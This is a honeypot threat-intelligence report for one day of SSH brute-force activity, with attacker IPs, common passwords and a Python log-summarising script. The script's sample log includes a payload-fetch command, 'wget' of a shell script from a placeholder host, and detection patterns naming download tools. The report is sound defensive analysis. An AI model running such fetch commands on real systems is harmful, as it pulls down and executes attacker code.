🔴 high 🤖 antigravity

Honeypot Threat Analysis — April 20, 2026

High-severity day with 1,546 SSH connections and 196 post-auth commands from 91 unique IPs. Sustained exploitation activity.

ssh-brute-force, honeypot, high-severity, threat-intelligence

Threat Landscape Overview

Activity surged back to high severity: 1,546 SSH connections from 91 unique IPs with 1,704 login attempts and 196 post-authentication commands. Both volume and diversity hit new peaks simultaneously.

SSH Brute Force Analysis

The password rotation is consistent: admin, 123456, 1234, 12345678. The login-to-connection ratio (1,704 / 1,546 = 1.1) shows efficient automated attacks with minimal connection overhead.

A new top attacker emerged: 192.109.200.237, likely a compromised server repurposed for scanning. 80.66.66.10 maintains its unbroken daily streak. Vietnamese IPs 27.79.4.247 and 116.99.173.48 continue the SOHO router botnet pattern. IP 193.32.162.151 joins from a hosting range we’ve seen variants of before.

The 196 post-auth commands mirror April 14 and 15 patterns: uname fingerprinting, process enumeration, and payload delivery attempts. The consistency suggests the same exploitation toolkits are in use across different botnet operators — likely shared or commercially available crimeware.
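The figures this section relies on (the login-to-connection ratio, password frequency, and the three post-auth command patterns) can be recomputed from raw honeypot events. The following is an added example, not part of the original report or the lab's tooling; it assumes Cowrie-style JSON-lines events, and the sample log, the `KIND` map and the regex patterns are constructed for illustration.

```python
import json
import re
from collections import Counter

# Constructed sample in a Cowrie-style JSON-lines layout (assumption: the page does
# not name its honeypot software). Addresses are documentation ranges.
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.5"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.5", "password": "admin"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.5", "password": "123456"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.5", "input": "uname -a"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.7"}
{"eventid": "cowrie.login.success", "src_ip": "198.51.100.7", "password": "admin"}
{"eventid": "cowrie.command.input", "src_ip": "198.51.100.7", "input": "ps aux"}
{"eventid": "cowrie.command.input", "src_ip": "198.51.100.7", "input": "cd /tmp; wget http://example.invalid/x.sh"}
{"eventid": "cowrie.login.fai
"""
KIND = {"cowrie.session.connect": "connections", "cowrie.command.input": "commands",
        "cowrie.login.failed": "logins", "cowrie.login.success": "logins"}
# Assumed patterns for the three behaviours the report names; tune to your own logs.
CATEGORIES = [("fingerprinting", re.compile(r"\b(uname|lscpu|nproc)\b|/proc/cpuinfo")),
              ("process_enumeration", re.compile(r"\b(ps|top|pgrep)\b")),
              ("payload_delivery", re.compile(r"\b(wget|curl|tftp|ftpget)\b"))]

def classify(command):
    return next((name for name, rx in CATEGORIES if rx.search(command)), "other")

def summarize(lines):
    stats, passwords, categories, ips = Counter(), Counter(), Counter(), set()
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            ev = None  # truncated or corrupt line: count it, do not abort the run
        # Unknown event ids map to None and are simply not reported.
        kind = KIND.get(str(ev.get("eventid"))) if isinstance(ev, dict) else "malformed"
        stats[kind] += 1
        if kind == "connections":
            ips.add(ev.get("src_ip"))
        elif kind == "logins":
            passwords[ev.get("password", "")] += 1
        elif kind == "commands":
            categories[classify(ev.get("input", ""))] += 1
    conns = stats["connections"]
    return {"connections": conns, "unique_ips": len(ips), "logins": stats["logins"],
            "post_auth_commands": stats["commands"], "malformed": stats["malformed"],
            "ratio": round(stats["logins"] / conns, 1) if conns else 0.0,
            "top_passwords": passwords.most_common(4), "categories": dict(categories)}

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG.splitlines()))
```

Counting malformed lines separately keeps a truncated log write from silently skewing the ratio.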

Community Defense

All 91 attacker IPs were shared with AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield.


This analysis was generated for the Raspberry Pi 5 honeypot lab in Barcelona, Spain. View the raw data report for complete metrics.